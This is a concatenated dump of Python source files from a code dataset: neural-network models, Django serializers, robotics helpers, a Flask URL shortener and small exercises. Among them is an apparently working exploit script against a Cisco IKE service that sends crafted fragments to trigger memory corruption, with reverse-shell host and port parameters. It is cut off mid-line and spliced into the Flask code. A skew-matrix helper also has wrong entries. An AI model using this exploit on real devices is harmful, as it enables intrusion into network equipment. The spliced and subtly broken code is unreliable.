DecoderBlock(in_channels=channel * 2, out_channels=channel,doubleconv=False)\n self.decoder9 = DecoderBlock(in_channels=channel, out_channels=channel,doubleconv=False)\n\n # adaptive Flusion module\n self.afm3 = AFM(channel, channel * 3)\n self.afm2 = AFM(channel, channel * 3)\n self.afm1 = AFM(channel, channel * 3)\n self.afm0 = AFM(channel, channel * 3)\n self.afm4 = SELayer(channel)\n\n self.rcm1 = RCM(channel * 3, channel)\n self.rcm2 = RCM(channel * 3, channel)\n self.rcm3 = RCM(channel * 3, channel)\n self.rcm0 = RCM(channel * 3, channel)\n self.rcm4 = RCM(channel, channel)\n\n self.unetout1 = nn.Conv2d(channel, 1, 1)\n self.unetout2 = nn.Conv2d(channel, 1, 1)\n\n def forward(self, x):\n basic = x\n x = self.resnet.conv1(x)\n x = self.resnet.bn1(x)\n x0 = self.resnet.relu(x) # 64 172 172\n\n # ---- low-level features ----\n x = self.resnet.maxpool(x0) # bs, 64, 88, 88\n x1 = self.resnet.layer1(x) # bs, 256, 88, 88\n\n # ---- high-level features ----\n x2 = self.resnet.layer2(x1) # bs, 512, 44, 44\n x3 = self.resnet.layer3(x2) # bs, 1024, 22, 22\n x4 = self.resnet.layer4(x3) # bs, 2048, 11, 11\n\n x0 = self.Translayer0(x0)\n x1 = self.Translayer1(x1)\n x2 = self.Translayer2(x2)\n x3 = self.Translayer3(x3)\n x4 = self.Translayer4(x4)\n\n # decoder1\n\n afm4 = self.afm4(x4)\n d1_4 = self.decoder4(afm4) # b 320 22 22\n afm3 = self.afm3(x3, self.upsample(x4), d1_4) # 512+320+320\n d1_3 = self.decoder3(afm3) # b 128 44 4\n afm2 = self.afm2(x2, self.upsample(x3), d1_3)\n d1_2 = self.decoder2(afm2) # b 128 88 88\n afm1 = self.afm1(x1, self.upsample(x2), d1_2)\n d1_1 = self.decoder1(afm1)\n afm0 = self.afm1(x0, self.upsample(x1), d1_1)\n d1_0 = self.decoder0(afm0)\n\n # rcm\n x0 = self.rcm1(afm0, x0) # b 64 88 88\n x1 = self.rcm1(afm1, x1) # b 64 88 88\n x2 = self.rcm2(afm2, x2) # b 64 44 44\n x3 = self.rcm3(afm3, x3) # b 64 22 22\n x4 = self.rcm4(afm4, x4) # b 64 11 11\n\n # feadback\n guidance = d1_0\n guidance0 = F.interpolate(guidance, scale_factor=1 / 16, mode='bilinear')\n guidance1 = F.interpolate(guidance, scale_factor=1 / 8, mode='bilinear')\n guidance2 = F.interpolate(guidance, scale_factor=1 / 4, mode='bilinear')\n guidance3 = F.interpolate(guidance, scale_factor=1 / 2, mode='bilinear')\n x4 = x4 + guidance0\n x3 = x3 + guidance1\n x2 = x2 + guidance2\n x1 = x1 + guidance3\n x0 = x0 + guidance\n\n # decoder 2\n x4_1 = x4\n x3_1 = self.upsample(x4) * x3\n x2_1 = self.upsample(x3) * x2\n x1_1 = self.upsample(x2) * x1\n x0_1 = self.upsample(x1) * x0\n\n x4_1 = self.decoder9(x4_1)\n x3_2 = torch.cat((x3_1, x4_1), 1)\n x3_2 = self.decoder8(x3_2)\n x2_2 = torch.cat((x2_1, x3_2), 1)\n x2_2 = self.decoder7(x2_2)\n x1_2 = torch.cat((x1_1, x2_2), 1)\n x1_2 = self.decoder6(x1_2)\n\n x0_2 = torch.cat((x0_1, x1_2), 1)\n x0_2 = self.decoder5(x0_2)\n\n pred1 = self.unetout1(d1_0)\n pred2 = self.unetout2(x0_2)\n\n pred2 = F.interpolate(pred2, scale_factor=2, mode='bilinear')\n pred1 = F.interpolate(pred1, scale_factor=2, mode='bilinear')\n\n return pred1, pred2\n\n\nif __name__ == '__main__':\n model = BiDFNet().cuda()\n input_tensor = torch.randn(1, 3, 352, 352).cuda()\n\n pred2, pred1 = model(input_tensor)\n print(pred2.size())\n print(pred1.size())\n # print(prediction1.size())\n # print(prediction2.size())\n # print(prediction3.size())\n # print(prediction4.size())\n\n # net =BCA(64,64,64)\n # a =torch.rand(1,64,44,44)\n # b =torch.rand(1,64,44,44)\n # print(net(a,b).size())","sub_path":"model/idea1/BiDFNet-Resnet.py","file_name":"BiDFNet-Resnet.py","file_ext":"py","file_size_in_byte":9999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"11275561","text":"\"\"\"Structure of account related models API responses with Django Rest Framework serializers.\"\"\"\nfrom django.contrib.auth import get_user_model\n\nfrom rest_framework import serializers\n\nfrom ..models import Organization, OrganizationAccess\n\n\nclass OrganizationAccessSerializer(serializers.ModelSerializer):\n \"\"\"\n Organization access serializer.\n\n Represents the link between a user and an organization, with a role that grants a specific\n level of access.\n \"\"\"\n\n organization_name = serializers.SerializerMethodField()\n\n class Meta:\n \"\"\"Meta for OrganizationAccessSerializer.\"\"\"\n\n model = OrganizationAccess\n fields = [\n \"organization\",\n \"organization_name\",\n \"role\",\n \"user\",\n ]\n\n def get_organization_name(self, organization_access):\n \"\"\"\n Get field for Serializer Method.\n\n Add the organization name on organization accesses directly, to avoid nesting an\n additional object just for one string.\n \"\"\"\n return organization_access.organization.name\n\n\nclass OrganizationSerializer(serializers.ModelSerializer):\n \"\"\"Serializer to display a complete Organization resource.\"\"\"\n\n class Meta:\n \"\"\"Meta for OrganizationSerializer.\"\"\"\n\n model = Organization\n fields = [\n \"consumer_sites\",\n \"created_on\",\n \"id\",\n \"name\",\n \"users\",\n ]\n\n\nclass UserSerializer(serializers.ModelSerializer):\n \"\"\"\n Regular user serializer.\n\n Allowlist fields as user objects contain a lot more information\n than we'd like to expose on the API.\n \"\"\"\n\n organization_accesses = OrganizationAccessSerializer(many=True)\n\n class Meta:\n \"\"\"Meta for UserSerializer.\"\"\"\n\n model = get_user_model()\n fields = [\n \"date_joined\",\n \"email\",\n \"first_name\",\n \"id\",\n \"is_staff\",\n \"is_superuser\",\n \"last_name\",\n \"organization_accesses\",\n ]\n","sub_path":"src/backend/marsha/core/serializers/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"331643221","text":"from pinocchio import se3\nimport copy\nimport numpy as np\n\ndef vectorToSE3(vec): \n M = se3.SE3()\n\n rot_tmp = np.matrix(np.ones((3, 3)))\n rot_tmp[0:3, 0] = vec[3:6]\n rot_tmp[0:3, 1] = vec[6:9]\n rot_tmp[0:3, 2] = vec[9:12]\n\n M.translation = copy.deepcopy(vec[0:3])\n M.rotation= rot_tmp\n return M\n\ndef SE3toVector(M):\n ref = np.matrix(np.zeros(12)).transpose()\n ref[0:3] = copy.deepcopy(M.translation)\n ref[3:6] = copy.deepcopy(M.rotation[0:3, 0])\n ref[6:9] = copy.deepcopy(M.rotation[0:3, 1])\n ref[9:12] = copy.deepcopy(M.rotation[0:3, 2])\n\n return ref\n\n\ndef skew(x):\n return np.array([[0, -x[2], x[1]],\n [x[2], 0, x[0]],\n [x[1], x[0], 0]])","sub_path":"Utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"513176358","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Function\nimport numpy as np\n\nclass Conv(torch.nn.Module):\n \"\"\"\n A convolution with the option to be causal and use xavier initialization\n \"\"\"\n def __init__(self, in_channels, out_channels, kernel_size=1, stride=1,\n dilation=1, bias=True, w_init_gain='linear', is_causal=False):\n super(Conv, self).__init__()\n self.is_causal = is_causal\n self.kernel_size = kernel_size\n self.dilation = dilation\n\n self.conv = torch.nn.Conv1d(in_channels, out_channels,\n kernel_size=kernel_size, stride=stride,\n dilation=dilation, bias=bias)\n\n torch.nn.init.xavier_uniform_(\n self.conv.weight, gain=torch.nn.init.calculate_gain(w_init_gain))\n\n def forward(self, signal):\n #if self.is_causal:\n # padding = (int((self.kernel_size - 1) * self.dilation), 0)\n # signal = torch.nn.functional.pad(signal, padding)\n return self.conv(signal)\n\nclass Wavenet(nn.Module):\n def __init__(self, pad, sd, rd, dilations0,dilations1,device):\n print(\"nv wavenet\")\n self.dilations1 = dilations1\n self.device=device\n sd = 512\n rd = 128\n self.sd = sd\n self.rd = rd\n self.init_filter=2\n self.field=np.sum(dilations1)+self.init_filter\n wd = 128\n print('sd rd:',sd,rd)\n self.wd=wd\n super(Wavenet, self).__init__()\n self.embedy = torch.nn.Embedding(256,wd)\n #self.casual = torch.nn.Conv1d(256,wd,self.init_filter)\n self.pad = pad\n self.ydcnn = nn.ModuleList()\n self.ydense = nn.ModuleList()\n self.yskip = nn.ModuleList()\n\n for i, d in enumerate(self.dilations1):\n self.ydcnn.append(Conv(wd, wd*2,kernel_size=2, dilation=d, w_init_gain='tanh', is_causal=True))\n #self.ydcnn.append(Conv(rd, 2 * rd, kernel_size=2, dilation=d, w_init_gain='relu', is_causal=True))#try relu\n self.yskip.append(Conv(wd, sd,w_init_gain='relu'))\n self.ydense.append(Conv(wd, wd,w_init_gain='linear'))\n\n self.post1 = Conv(sd, sd, bias=False, w_init_gain='relu')\n self.post2 = Conv(sd, 256, bias=False, w_init_gain='linear')\n\n def forward(self, y):\n y = self.embedy(y.long())\n y = y.transpose(1, 2)\n\n finalout = y.size(2)-(self.field-1)\n\n for i, d in enumerate(self.dilations1):\n in_act = self.ydcnn[i](y)\n in_act = in_act\n t_act = torch.nn.functional.tanh(in_act[:, :self.wd, :])\n s_act = torch.nn.functional.sigmoid(in_act[:, self.wd:, :])\n acts = t_act * s_act\n\n res_acts = self.ydense[i](acts)\n\n if i == 0:\n output = self.yskip[i](acts[:,:,-finalout:])\n else:\n output = self.yskip[i](acts[:,:,-finalout:]) + output\n\n y = res_acts + y[:,:,d:]\n\n output = torch.nn.functional.relu(output, True)\n output = self.post1(output)\n output = torch.nn.functional.relu(output, True)\n output = self.post2(output)\n\n return output\n\n def infer(self,queue,l = 16000*1):\n #y = torch.randint(0, 255, (1,1)).to(self.device)\n y = torch.randint(0, 255, (1,1)).to(self.device)\n l = int(l)\n music=torch.zeros(l)\n for idx in range(l):\n y = self.embedy(y.long())\n y = y.transpose(1, 2)\n for i, d in enumerate(self.dilations1):\n y = torch.cat((queue[i],y),2)\n if(d == 1):\n queue[i] = y[:,:,:1].clone()\n else:\n queue[i] = torch.cat((queue[i][:, :, 1:], y[:, :, :1]), 2)\n in_act = self.ydcnn[i](y)\n t_act = torch.nn.functional.tanh(in_act[:, :self.wd, :])\n s_act = torch.nn.functional.sigmoid(in_act[:, self.wd:, :])\n acts = t_act * s_act\n\n res_acts = self.ydense[i](acts)\n\n if i == 0:\n output = self.yskip[i](acts[:,:,-1:])\n else:\n output = self.yskip[i](acts[:,:,-1:]) + output\n\n y = res_acts + y[:,:,d:]\n\n output = torch.nn.functional.relu(output, True)\n output = self.post1(output)\n output = torch.nn.functional.relu(output, True)\n output = self.post2(output)\n y = output.max(1, keepdim=True)[1].view(-1)[0]\n y = y.view(1,1)\n music[idx] = y.cpu()[0,0]\n return music\n\n def slowInfer(self,queue,input=None,l = 16000*0.01):\n l = int(l)\n label = input[:,self.field:self.field+l].clone().view(-1)\n input = input[:,:self.field].clone().to(self.device)\n\n music=torch.zeros(l)\n for idx in range(l):\n y = self.embedy(input)\n y = y.transpose(1, 2)\n for i, d in enumerate(self.dilations1):\n in_act = self.ydcnn[i](y)\n t_act = torch.nn.functional.tanh(in_act[:, :self.wd, :])\n s_act = torch.nn.functional.sigmoid(in_act[:, self.wd:, :])\n acts = t_act * s_act\n\n res_acts = self.ydense[i](acts)\n\n if i == 0:\n output = self.yskip[i](acts[:,:,-1:])\n else:\n output = self.yskip[i](acts[:,:,-1:]) + output\n\n y = res_acts + y[:,:,d:]\n\n output = torch.nn.functional.relu(output, True)\n output = self.post1(output)\n output = torch.nn.functional.relu(output, True)\n output = self.post2(output)\n #print(output.shape)\n #print(input.shape,output.max(1, keepdim=True)[1].shape)\n p=F.softmax(output,dim=1)\n out = np.random.choice(np.arange(256), p=p.view(-1).cpu().numpy())\n out = torch.tensor([out],dtype=torch.long).view(1,1).to(self.device)\n input = torch.cat((input[:,1:].long(),out),1)\n music[idx] = input.cpu()[0,-1]\n #print(float(float(torch.sum(music.long() == label.long())) / float(music.shape[0])))\n return music\n\n","sub_path":"nvwavenet.py","file_name":"nvwavenet.py","file_ext":"py","file_size_in_byte":6252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"411569336","text":"#!/usr/bin/env python2.7\n\nimport socket\nimport sys\nimport struct\nimport string\nimport random\nimport time\n\n\nclass Exploit(object):\n def __init__(self, host, revHost, revPort=4444):\n self._host = host\n self._port = 500\n self._revHost = revHost\n self._revPort = revPort\n self._sessions = []\n\n # Create a new SA session\n def create_SA(self, id=None):\n\n # Create a new socket for session\n sess = Session((self._host, self._port), id)\n\n # Append to session list\n self._sessions.append(sess)\n\n return sess\n\n\n# SA Session\nclass Session(object):\n def __init__(self, host_port, id = None):\n if id is None:\n id = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))\n\n self._host, self._port = host_port\n print(\"[+] Create UDP socket\")\n self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self._id = id\n self._mid = 1\n\n # Init session\n print(\"[+] Using session ID: \" + self._id)\n self.send(self.make_SA())\n print(\"[+] Send SA\")\n\n # Check if we got something\n res = self.recv()\n cookie = res[8:16]\n print(\"[+] Cookie: \" + cookie)\n\n self._cookie = cookie\n\n # Enforce value of 0x21\n if ord(res[16]) != 0x21:\n raise Exception(\"Invalid router response\")\n\n print(\"[+] New SA successfully created.\")\n\n # UPD socket helpers\n def send(self, buf):\n self._sock.sendto(buf, (self._host, self._port))\n\n def recv(self, size=4096):\n data, addr = self._sock.recvfrom(size)\n return data\n\n def make_SA(self):\n buf = \"\"\n buf += self._id # Initiator SPI\n buf += \"\\x00\"*8 # Responder SPI\n buf += \"\\x21\" # next payload (security association)\n buf += \"\\x20\" # version\n buf += \"\\x22\" # exchange type\n buf += \"\\x08\" # flags\n buf += \"\\x00\"*4 # message ID\n buf += \"$$$$\" # length\n\n # stolen from pcap\n # THIS IS SECURITY ASSOCIATION\n buf += \"\\x22\\x00\\x00\\x6c\\x00\\x00\\x00\\x68\\x01\\x01\\x00\\x0b\\x03\\x00\\x00\\x0c\\x01\\x00\\x00\\x0c\\x80\\x0e\\x01\\x00\\x03\\x00\\x00\\x0c\\x01\\x00\\x00\\x0c\\x80\\x0e\\x00\\x80\\x03\\x00\\x00\\x08\\x01\\x00\\x00\\x03\\x03\\x00\\x00\\x08\\x01\\x00\\x00\\x02\\x03\\x00\\x00\\x08\\x02\\x00\\x00\\x02\\x03\\x00\\x00\\x08\\x02\\x00\\x00\\x01\\x03\\x00\\x00\\x08\\x03\\x00\\x00\\x02\\x03\\x00\\x00\\x08\\x03\\x00\\x00\\x01\\x03\\x00\\x00\\x08\\x04\\x00\\x00\\x02\\x03\\x00\\x00\\x08\\x04\\x00\\x00\\x05\\x00\\x00\\x00\\x08\\x04\\x00\\x00\\x0e\"\n\n # THIS IS KEY EXCHANGE\n # this is the type of the next payload...\n buf += \"\\x28\" # 0x28 = Nonce, 0x2b = vendor ID\n # KEY EXCHANGE DATA\n buf += \"\\x00\\x00\\x88\\x00\\x02\\x00\\x00\\x50\\xea\\xf4\\x54\\x1c\\x61\\x24\\x1b\\x59\\x3f\\x48\\xcb\\x12\\x8c\\xf1\\x7f\\x5f\\xd4\\xd8\\xe9\\xe2\\xfd\\x3c\\x66\\x70\\xef\\x08\\xf6\\x56\\xcd\\x83\\x16\\x65\\xc1\\xdf\\x1c\\x2b\\xb1\\xc4\\x92\\xca\\xcb\\xd2\\x68\\x83\\x8e\\x2f\\x12\\x94\\x12\\x48\\xec\\x78\\x4b\\x5d\\xf3\\x57\\x87\\x36\\x1b\\xba\\x5b\\x34\\x6e\\xec\\x7e\\x39\\xc1\\xc2\\x2d\\xf9\\x77\\xcc\\x19\\x39\\x25\\x64\\xeb\\xb7\\x85\\x5b\\x16\\xfc\\x2c\\x58\\x56\\x11\\xfe\\x49\\x71\\x32\\xe9\\xe8\\x2d\\x27\\xbe\\x78\\x71\\x97\\x7a\\x74\\x42\\x30\\x56\\x62\\xa2\\x99\\x9c\\x56\\x0f\\xfe\\xd0\\xa2\\xe6\\x8f\\x72\\x5f\\xc3\\x87\\x4c\\x7c\\x9b\\xa9\\x80\\xf1\\x97\\x57\\x92\"\n\n # this is the Nonce payload\n buf += \"\\x2b\"\n buf += \"\\x00\\x00\\x18\\x97\\x40\\x6a\\x31\\x04\\x4d\\x3f\\x7d\\xea\\x84\\x80\\xe9\\xc8\\x41\\x5f\\x84\\x49\\xd3\\x8c\\xee\"\n # lets try a vendor id or three\n buf += \"\\x2b\" # next payload, more vendor ID\n buf += \"\\x00\" # critical bit\n vid = \"CISCO-DELETE-REASON\"\n buf += struct.pack(\">H\", len(vid)+4)\n buf += vid\n\n # another vendor id\n buf += \"\\x2b\" # next payload, more vendor ID\n buf += \"\\x00\" # critical bit\n vid = \"CISCO(COPYRIGHT)&Copyright (c) 2009 Cisco Systems, Inc.\"\n buf += struct.pack(\">H\", len(vid)+4)\n buf += vid\n\n # another vendor id\n buf += \"\\x2b\" # next payload, more vid\n buf += \"\\x00\" # crit\n vid = \"CISCO-GRE-MODE\"\n buf += struct.pack(\">H\", len(vid)+4)\n buf += vid\n\n # last vendor id\n buf += \"\\x00\" # next payload\n buf += \"\\x00\"\n vid = \"\\x40\\x48\\xb7\\xd5\\x6e\\xbc\\xe8\\x85\\x25\\xe7\\xde\\x7f\\x00\\xd6\\xc2\\xd3\"\n buf += struct.pack(\">H\", len(vid)+4)\n buf += vid\n\n return buf.replace(\"$$$$\", struct.pack(\">L\", len(buf)))\n\n def make_cisco_fragment(self, flength, seqno, fragid, lastfrag, sploit):\n buf = ''\n buf += self._id # Initiator SPI (random)\n buf += self._cookie # Responder SPI\n buf += \"\\x84\" # next payload\n buf += \"\\x20\" # version\n buf += \"\\x25\" # exchange type (2=identify protection)\n buf += \"\\x08\" # flags\n buf += \"\\x00\\x00\\x00\\x01\" # message ID\n buf += \"ABCD\" # length\n\n # PAYLOAD\n payload = \"\"\n payload += \"\\x00\" # next payload (none)\n payload += \"\\x00\" # critical bit\n payload += struct.pack(\">H\", flength) # payload_len # length\n payload += struct.pack(\">H\", fragid) # frag ID\n payload += struct.pack(\"B\", seqno) # frag sequence\n payload += struct.pack(\"B\", lastfrag)\n payload += sploit\n\n buf += payload\n return buf.replace(\"ABCD\", struct.pack(\">L\", len(buf)))\n\n def send_fragment(self, flength, seqno, fragid, lastfrag, sploit):\n buf = self.make_cisco_fragment(flength, seqno, fragid, lastfrag, sploit)\n self.send(buf)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print(\"[+] Usage: {0:s} [:port]\".format(sys.argv[0]))\n sys.exit(0)\n\n host = sys.argv[1]\n revHost = sys.argv[2]\n\n # Parse revHost\n port = 4444\n if revHost.rfind(\":\") != -1:\n revHost, port = revHost.split(\":\")\n port = int(port)\n\n exploit = Exploit(host, revHost, port)\n sess = exploit.create_SA()\n\n n = 0xd6\n ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))\n sess.send_fragment(0x8 + n + 3, 1, 5, 0, \"A\" * (n + 3))\n\n # Send packets which will trigger the vulnerability\n # Weird packet to get a size of 0x1\n sess.send_fragment(8 + -7, 0, 6, 1, \"A\" * (256 - 7))\n\n # This fragment will be the one being copied\n # during the memory corruption\n buf = \"A\" * (n - 0xd + 0x3)\n buf += struct.pack(\"')\ndef map_route(code):\n if os.path.exists('data.json'):\n with open('data.json') as datafile:\n mapping = json.load(datafile)\n if code in mapping.keys():\n if 'url' in mapping[code].keys():\n return redirect(mapping[code]['url'])\n return abort(404)\n\n\n@app.errorhandler(404)\ndef error_function(error):\n return \"error bro\"\n\n\n@app.route('/api')\ndef session_api():\n return jsonify(list(session.keys()))\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"590914551","text":"from Quadrilateral import *\n\nprint(\"what shape are we calculating area or perimeter for?\")\nshape = input()\nprint(\"Are we calculating area or perimeter?\")\ncalc= input().lower()\n\n\ndef what_shape(shape):\n if shape =='rectangle':\n return is_rect(calc)\n elif shape =='square':\n return is_square(calc)\n elif shape == 'rhombus':\n return is_rhombus(calc)\n elif shape == 'trapezoid':\n return is_trap(calc)\n else:\n raise AssertionError('Please enter a shape in the listed directory')\n\n\nresponse = what_shape(shape)\nprint(\"Your {0} is\".format(calc), response)","sub_path":"AreaCalculator/Area.py","file_name":"Area.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"84376348","text":"#!/usr/bin/Anaconda3/python\n# -*- coding: utf-8 -*- \n# @Time : 2019/8/20 1:34 \n\n\"\"\"\n企业发放的奖金根据利润提成。利润 (I) :\n+ 低于或等于 10 万元时,奖金可提 10%;\n+ 高于 10 万元,低于 20 万元时,低于 10 万元的部分按 10%提成,高于10万元的部分,可提成 7.5%;\n+ 20 万到 40 万之间时,高于 20 万元的部分,可提成 5%;\n+ 40 万到 60 万之间时,高于 40 万元的部分,可提成 3%;\n+ 60 万到 100 万之间时,高于 60 万元的部分,可提成 1.5%,\n+ 高于 100 万元时, 超过 100 万元的部分按 1%提成\n\"\"\"\nIin = int(input(\"请输入月利润(万元):\"))\nxIin = [0,10,20,40,60,100] # 利润\nxIin.reverse()\nyIin = [10,7.5,5,3,1.5,1] # 提成\nyIin.reverse()\nres = 0.0\nfor i in range(len(xIin)):\n if Iin > xIin[i]:\n res1 = (Iin-xIin[i])*yIin[i]/100\n print(\"第%s次,利润:[%0.3s,%3s],提成:%4s,奖金数:%s万元\"%(i,xIin[i],xIin[i-1],yIin[i],res1))\n res += res1\n Iin = xIin[i]\n\nprint(\"总利润:%s万元\"%res)\n\n\n","sub_path":"03_Python100题/002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"295988143","text":"__author__ = 'Hiren'\nfrom django import template\nfrom menus.models import Menu\nfrom userSettings.models import UserSetting\n\nregister = template.Library() #DO NOT REMOVE. Required for module to load correctly\n\n# Name: getSubMenuList\n# Description: Given a menu record, generate HTML string of its sub menus\n# Parameters:\n# menu (I,REQ) - Menu record\n# security_level (I,REQ) - User's security level. Limits which menus are available\n# Returns: HTML string of menu tree under the one passed in.\ndef getSubMenuList(menu, security_level):\n sSubMenuList = \"\"\n\n # Check if loading an action button, in which case the sub menu search stops here\n if menu.menu_type == 'ACTION':\n sSubMenuList = \"
  • \" + menu.display_name + \"
  • \"\n else:\n # We're checking a main or sub menu. Find child menu items\n subMenuList = Menu.objects.filter(\n parent_menu_items=menu.id\n ).exclude(\n # Main menu records can't be sub menus\n menu_type='MAIN'\n ).exclude(\n # Only load the menu if the user has the appropriate security\n securityLevel__gt=security_level\n )\n\n for subMenu in subMenuList:\n sSubMenuList += getSubMenuList(subMenu, security_level)\n\n # Only add current menu if there's at least one action menu down the tree\n if sSubMenuList != \"\":\n # Label on a main menu item is printed differently than sub menu labels\n if menu.menu_type == 'MAIN':\n sSubMenuList = \"
  • \" + menu.display_name + \"
      \" + sSubMenuList + \"
  • \"\n else:\n sSubMenuList = \"
  • \" + menu.display_name + \"...
      \" + sSubMenuList + \"
  • \"\n\n return sSubMenuList\n\n@register.inclusion_tag('menu_template.html')\ndef show_menu(current_user):\n\n loggedIn = current_user.is_authenticated()\n\n sMenuList = \"\"\n if loggedIn:\n\n # Load user settings to get logged in user's security level\n user_settings = UserSetting.objects.get(user=current_user.id)\n\n #Load menu items\n mainMenuList = Menu.objects.filter(menu_type='MAIN')\n for mainMenu in mainMenuList:\n # For each main menu, load available sub menus\n sMenuList += getSubMenuList(mainMenu, user_settings.securityLevel)\n\n return {\n 'menu_list': sMenuList,\n 'logged_in': loggedIn,\n }\n\n","sub_path":"HirenAuto/menus/templatetags/menu_templatetags.py","file_name":"menu_templatetags.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"544117813","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2019/5/25 16:37\n@Author : QuYue\n@File : data_process.py\n@Software: PyCharm\nIntroduction: Process the data.\n\"\"\"\n#%% Import Packages\nimport torch\nimport numpy as np\nimport torch\nimport sklearn.model_selection\n#%% Function\ndef label_from_0(Y):\n # Change the label from 0\n Y = np.array(Y)\n Y -= Y.min()\n return Y\n\ndef cut_out(X, len):\n # Cut out the ECG signal\n X_new = []\n for i in X:\n X_new.append(i[:, : len])\n output = np.array(X_new)\n return X_new\n\ndef axis_change(X):\n # Change the ECG data's axis to channel * length* width\n for i in range(len(X)):\n X[i] = X[i][..., np.newaxis]\n return X\n\ndef to_tensor(X, Y):\n # Change the data to torch.Tensor\n X = torch.FloatTensor(X)\n Y = torch.FloatTensor(Y).type(torch.LongTensor)\n return X, Y\n\n\ndef train_test_split(X, Y, trainratio=0.9, random_state=0):\n # Split the train data and test data\n train_x, test_x, train_y, test_y = sklearn.model_selection.train_test_split(X, Y,\n test_size=1 - trainratio,\n random_state=random_state,\n stratify=Y)\n return train_x, test_x, train_y, test_y\n\n","sub_path":"Workspace/Code/Experiment2_Multi_channel_CNN/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"378560110","text":"#BUENA PRÁCTICA --> Función principal que corra el programa, se le suele llamar run o main\n#Entry point --> Punto de entrada del programa\n\ndef palindromo(palabra):\n palabra = palabra.replace(' ', '').lower() #eliminar los espacios y bajar a mayúsculas\n\n if palabra == palabra[::-1]:\n return True\n else:\n return False\n\ndef run(): \n palabra = input('Escribe una palabra: ')\n\n if palindromo(palabra) == True:\n print('Es palindromo')\n else:\n print('No es palíndromo')\n\n\nif __name__ == '__main__':\n run()","sub_path":"palindromo.py","file_name":"palindromo.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"437336970","text":"\"\"\"\nCheck whether two strings are anagram of each other\nWrite a function to check whether two given strings are anagram of each other or not. An anagram of a string is another string that contains same characters, only the order of characters can be different. For example, “abcd” and “dabc” are anagram of each other.\n\nAnagram Words\n\nListen - Silent\n\nTriangle - Integral\n\nMethod 1 (Use Sorting)\n\nSort both strings\nCompare the sorted strings\n\nTime Complexity: O(nLogn)\n\nMethod 2 (Count characters)\nThis method assumes that the set of possible characters in both strings is small. In the following implementation, it is assumed that the characters are stored using 8 bit and there can be 256 possible characters.\n\nCreate count arrays of size 256 for both strings. Initialize all values in count arrays as 0.\nIterate through every character of both strings and increment the count of character in the corresponding count arrays.\nCompare count arrays. If both count arrays are same, then return true.\n\n\"\"\"\n\n# Python program to check if two strings are anagrams of\n# each other\nNO_OF_CHARS = 256\n\n# Function to check whether two strings are anagram of\n# each other\ndef are_anagram(str1, str2):\n count1=[0]*NO_OF_CHARS\n count2 = [0] * NO_OF_CHARS\n for item in str1:\n count1[ord(item)]+=1\n for item in str2:\n count2[ord(item)] += 1\n if (len(str1)!=len(str2)):\n return False\n for i in range(NO_OF_CHARS):\n if(count1[i]!=count2[i]):\n return False\n return True\n# print(are_anagram(\"geeksforgeeks\", \"forgeeksgeeks\"))\n\ndef anagram(a, b):\n if not len(a)==len(b):\n return False\n\n str1 = sorted(a.lower())\n str2 = sorted(b.lower())\n if str1 == str2:\n return True\n else:\n return False\n\nprint(anagram(\"abcde\", \"aBced\"))","sub_path":"Algorithms/String/3_anagram.py","file_name":"3_anagram.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"603851493","text":"from scipy.optimize import minimize\r\n\r\n# loss function\r\nfun = lambda x: x[0]**2 + x[1]**2 - 6*x[0]*x[1] - 4*x[0] - 5*x[1]\r\n\r\n# constraints\r\nc1 = lambda x: -(x[0] - 2)**2 + 4 - x[1]\r\nc1_updated = lambda x: -(x[0] - 2)**2 + 4.1 - x[1]\r\nc2 = lambda x: x[1] + x[0] - 1\r\n\r\ncons = ({'type': 'ineq', 'fun': c1},\r\n{'type': 'ineq', 'fun': c2})\r\n\r\nres = minimize(fun, (2, 0), method='SLSQP', constraints=cons)\r\n\r\nprint(res)\r\n\r\ncons = ({'type': 'ineq', 'fun': c1_updated},\r\n{'type': 'ineq', 'fun': c2})\r\n\r\nres = minimize(fun, (2, 0), method='SLSQP', constraints=cons)\r\n\r\nprint(res)","sub_path":"PS0/ESE546_HW0_Solutions/problem3.py","file_name":"problem3.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"38579648","text":"from nltk.stem import PorterStemmer\r\nimport os, shutil\r\nfrom shutil import copyfile\r\nimport collections, operator\r\nfrom distutils.dir_util import copy_tree\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\ndef get_topics(dict_actual,key_actual,dict_predicted,key_predicted):\r\n list_actual=dict_actual.get(key_actual)\r\n list_predicted=dict_predicted.get(key_predicted)\r\n return list_actual,list_predicted[0:5], list_predicted[0:2], list_predicted[0:8]\r\n\r\n\r\ndef 